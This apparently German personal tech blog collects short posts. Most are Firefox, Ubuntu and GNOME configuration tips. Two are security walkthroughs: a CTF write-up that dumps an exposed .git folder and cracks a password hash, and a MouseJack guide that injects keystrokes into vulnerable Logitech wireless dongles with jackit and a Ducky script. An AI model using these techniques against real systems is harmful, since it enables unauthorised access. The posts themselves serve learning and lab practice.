Firefox 77.0 Disable New Address Bar

2020-06-13 von Mario

Mit der Version 77 von Firefox ändert sich die Adressbar dahingehend, dass, sobald diese angeklickt wird, ein Zoom erfolgt. Leider wurde die Möglichkeit zur Deaktivierung dieses Features in der Version 77 abgeschafft (Firefox 75.0 Disable New Address Bar).

Mit den folgenden Einstellungen kann das Feature trotzdem deaktiviert werden. In die Adresszeile

about:config

eingeben und mit der Entertaste bestätigen. Daraufhin den Sicherheitshinweis ebenfalls bestätigen.

ff_performance

Als nächstes im Suchfeld nach den Einstellungen

toolkit.legacyUserProfileCustomizations.stylesheets

suchen.

Jetzt den Wert auf “false” setzen.

Als nächstes in die Adresszeile

about:profiles

eingeben.

Den Button „Ordner öffnen“ aus der Zeile Wurzelordner klicken. Es öffnet sich ein Fenster, welches alle Ordner in dem persönlichen Profil anzeigt. Hier muss ein weiterer Ordner mit dem Namen “chrome” angelegt werden, falls dieser nicht existiert. In den Ordner “chrome” eine Textdatei mit dem Namen “userChrome.css” anlegen und den folgenden CSS Code einfügen:

#urlbar[breakout][breakout-extend] {
    top: calc((var(--urlbar-toolbar-height) - var(--urlbar-height)) / 2) !important;
    left: 0 !important;
    width: 100% !important;
}

#urlbar[breakout][breakout-extend] > #urlbar-input-container {
    height: var(--urlbar-height) !important;
    padding-block: 0 !important;
    padding-inline: 0 !important;
}

#urlbar[breakout][breakout-extend][breakout-extend-animate] > #urlbar-background {
  animation-name: none !important;
}

#urlbar[breakout][breakout-extend] > #urlbar-background {
    box-shadow: none !important;
}

Im Anschluss den Firefox neu starten und die Adresszeile funktioniert wieder wie zuvor.

Kategorie: IT Schlagwörter: ,

Firefox 76.0 Scrollgeschwindigkeit erhöhen

2020-06-07 von Mario

Die Geschwindigkeit beim Scrollen mit dem Mausrad im Firefox kann wie folgt geändert werden. In der Adresszeile den Befehl:

about:config

eingeben und mit der Entertaste bestätigen. Daraufhin den Sicherheitshinweis bestätigen.

ff_performance

Als nächstes im Suchfeld nach der Einstellung

mousewheel.default.delta_multiplier_y

suchen.

Den Wert entsprechend erhöhen oder vermindern und die Scrollgeschwindigkeit (Y-Achse) entspricht dem persönlichen Wunsch.

 

Kategorie: IT Schlagwörter: ,

Ubuntu: Netzwerkschnittstellen umbenennen

2020-04-25 von Mario

Um bei Ubuntu die Netzwerkschnittstellen auf “eth0” oder “wlan0” umzubenennen, müssen folgende Schritte durchgeführt werden:

sudo nano /etc/default/grub

Den Eintrag

GRUB_CMDLINE_LINUX=""

auf den Wert

GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"

ändern und daraufhin den Befehl

grub-mkconfig -o /boot/grub/grub.cfg

ausführen, um die Änderungen im Bootloader zu übernehmen. Nach einem Neustart werden die geänderten Namen der Netzwerkschnittstellen dargestellt.

Kategorie: IT Schlagwörter:

Ubuntu 18.04: Deaktivieren automatisch öffnendes Dateifenster nach Automount

2020-04-24 von Mario

Wenn unter Ubuntu 18.04 Automount aktiv ist, dann wird beim Einbinden eines Datenträgers automatisch ein Dateifenster geöffnet. Mit der folgenden Einstellung kann das Verhalten abgeschaltet werden. Dafür in einem Terminal den Befehl eingeben:

gsettings set org.gnome.desktop.media-handling automount-open false

 

Die dafür notwendige Software “gsettings” kann mit dem Befehl

sudo apt-get install gsettings-desktop-schemas

installiert werden.

Kategorie: IT Schlagwörter:

0x00sec.dev: Exercise 1

2020-04-15 von Mario

Auf der Seite ctf.0x00sec.org werden CTF Spiele veröffentlicht. Für die erste Aufgabe hier ein writeup.

Challenge

Analyse

Da auf der Seite keine hilfreichen Informationen zu finden sind, wird der Quelltext der Seite untersucht.

Der Kommentar gibt einen Hinweis, an welcher Stelle gesucht werden soll.

</body>
  <!-- TODO: -->
  <!-- * Remove the git directory after publishing -->
</html>

Bei einem GIT Repository wird per default ein Ordner mit dem Namen “.git” angelegt. Weiterhin wird automatisch eine Struktur erstellt. Ein Versuch “https://exercise-1.0x00sec.dev/.git/” aufzurufen, ergab folgendes:

Die Anzeige der Fehlermeldung ist gut. Warum? Dadurch ist ersichtlich, dass der Ordner “.git” vorhanden ist.

Als nächstes kann jede einzelne Möglichkeit von weiteren Dateien oder Ordnern probiert werden, welche in der Dokumentation von GIT zu finden ist. Manuell macht das aber keinen Spaß. Das Tool “gitdumper” ist für diese Aufgabe perfekt geeignet.

 

Durchführung

Herunterladen des Tools “gitdumper” und starten.

./gitdumper.sh https://exercise-1.0x00sec.dev/.git/ DEST_FOLDER
Parameter Beschreibung
DEST_FOLDER Der Ordnername gibt an, wo die heruntergeladenen Dateien lokal gespeichert werden sollen.

 

Die Ausgabe von “gitdumper” stellt sich wie folgt dar:

Mit dem Befehl “tree” kann danach eine übersichtliche Darstellung der heruntergeladenen Daten erzeugt werden.

Die einzelnen Commits werden bei GIT gepackt (ZIP), um Speicherplatz zu sparen. Die relevanten Informationen befinden sich im Ordner “objects”. Für das Entpacken habe ich ein kleines Script geschrieben:

 

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import zlib  # A compression / decompression library

ROOT_DIR = "/EDIT_ME_PATH_TO_FOLDER/.git/objects/"

def readFile(path_to_file):

	compressed_content = open(path_to_file, 'rb').read()
	decompressed_content = zlib.decompress(compressed_content)
	print("--- BOF --- ")
	print(decompressed_content)
	print("--- EOF --- ")


def main():
	for root, subdirs, files in os.walk(ROOT_DIR):
		for file in files:
			tmp_file = os.path.join(root, file)
			print(tmp_file)
			readFile(tmp_file)


if __name__ == "__main__":
	main()

Das Script gibt die gepackten Daten aus. Zuvor muss die Variable “ROOT_DIR” auf den Ort der heruntergeladenen Daten entsprechend angepasst werden. Daraufhin das Script ausführen:

./zip_to_text.py

Da die Ausgabe etwas unübersichtlich ist, den Befehl erweitern:

./zip_to_text.py | grep Pass

Das sieht doch sehr gut aus. Hier findet ein Vergleich zwischen Username und Passwort statt, wobei das Passwort als SHA256 HASH abgelegt ist.

 

Den HASH-Wert gilt es zu cracken. Dafür kann eine beliebige Plattform verwendet werden.

Nach einigen Sekunden wurde der Originalwert des HASH (Result) angezeigt. Jetzt sind die Informationen für den Usernamen “admin” und für das Passwort “l33tsupah4x0r” bekannt und der Login kann durchgeführt werden.

 

Nach der Anmeldung wird das Flag “flag{g1t-dump1ng-i5-c00l}” angezeigt und die Aufgabe ist abgeschlossen.

Kategorie: IT-Security Schlagwörter: , , ,

Firefox 75.0 Disable New Address Bar

2020-04-13 von Mario

Mit der Version 75 von Firefox ändert sich die Adressbar dahingehend, dass sobald diese angeklickt wird, ein Zoom erfolgt. Mit den folgenden Einstellungen kann das Feature deaktiviert werden. In die Adresszeile

about:config

eingeben und mit der Entertaste bestätigen. Daraufhin den Sicherheitshinweis ebenfalls bestätigen.

ff_performance

Als nächstes im Suchfeld nach den Einstellungen

browser.urlbar.openViewOnFocus
browser.urlbar.update1
browser.urlbar.update1.interventions
browser.urlbar.update1.searchTips

suchen.

Jetzt alle Werte auf “false” setzen und das Feature ist deaktiviert.

 

Kategorie: IT Schlagwörter: ,

Inject Keystrokes into Logitech Keyboards

2020-04-05 von Mario

In bestimmten Versionen von Logitech Dongles gibt es eine Schwachstelle, welche es ermöglicht, Befehle an den angeschlossenen PC zu senden.

 

Hardware und Software

Für die Umsetzung wurde folgende Hardware verwendet:

  • Crazyradio PA USB radio dongle based on Nordic Semiconductor’s nRF24LU1+
  • Logitech USB Dongle (C-U0007 – FW ver 012.005.00028)
  • Ubuntu 18.04.3 LTS

 

Firmware Version auslesen

Mit den Befehl “fwupdmgr” kann die Versionsnummer des Logitech USB-Dongles ausgelesen werden.

fwupdmgr get-devices

In der darauf angezeigten Ausgabe kann die Firmware Version des Dongles ermittelt werden. Eine Liste, welche Geräte bzw. welche Firmware betroffen sind, gibt es hier: www.bastille.net

 

Firmware auf dem Crazyradio flashen

Als Voraussetzung für die Durchführung des Angriffs muss die Firmware auf den Crazyradio, nicht auf dem Logitech Dongle, geflasht werden. Um die Firmware zu erstellen, werden einige  Bibliotheken benötigt.

apt-get install sdcc binutils python python-pip git
pip install pyusb
pip install --upgrade pip
pip install --upgrade -I pyusb
pip install --upgrade platformio

Danach die Software “Mousejack” herunterladen.

git clone https://github.com/BastilleResearch/mousejack
git submodule init
git submodule update

Als letzter Schritt wird die Firmware erstellt und auf dem Crazyradio übertragen.

/nrf-research-firmware$ make
make install

Um zu verifizieren, ob die Firmware erfolgreich auf das Crazyradio geflasht wurde, diesen aus dem USB-Port ziehen und danach wieder anstecken. Als nächstes den Befehl “dmesg” ausführen und nach dem Text “RFStorm” suchen.

dmesg

Wird dieser angezeigt, ist der Schritt erfolgreich abgeschlossen.

 

Jackit installieren

Jackit wird für den eigentlichen Angriff benötigt. Mit der Software wird mit dem Crazyradio kommuniziert.

git clone https://github.com/insecurityofthings/jackit.git
cd jackit/
pip install -r requirements.txt
./setup.py build
./setup.py install

 

Attack

Zur Vorbereitung für den Angriff wird ein “Ducky” Script erstellt. Die hier enthaltenen Befehle werden auf dem Ziel-PC ausgeführt. Dafür die nachfolgende Auflistung in einer Textdatei “script.txt” speichern.

GUI r
DELAY 200
STRING calc.exe
ENTER

Mit dem Befehl “jackit” (als Root starten) kann jetzt nach potenziell verwundbaren Geräten gesucht werden.

Sobald ein Dongle gefunden wurde, die jeweilige Adresse “C7:D4:21:98:07” kopieren und das Programm mit “STRG + C” beenden. Jetzt “jackit” erneut mit einigen Parametern starten.

jackit --address C7:D4:21:98:07 --vendor logitech --script /path/to/ducky/script.txt

Nachdem der Dongle wieder erkannt wurde, mit “STRG + C” abbrechen, um in ein Untermenü von “jackit” zu gelangen. Jetzt mit der jeweiligen Nummer das Ziel (Spalte KEY) auswählen. Wenn alles funktioniert hat, dann hat sich auf dem Ziel-PC ein Taschenrechner geöffnet.

 

Links

Kategorie: IT-Security Schlagwörter: ,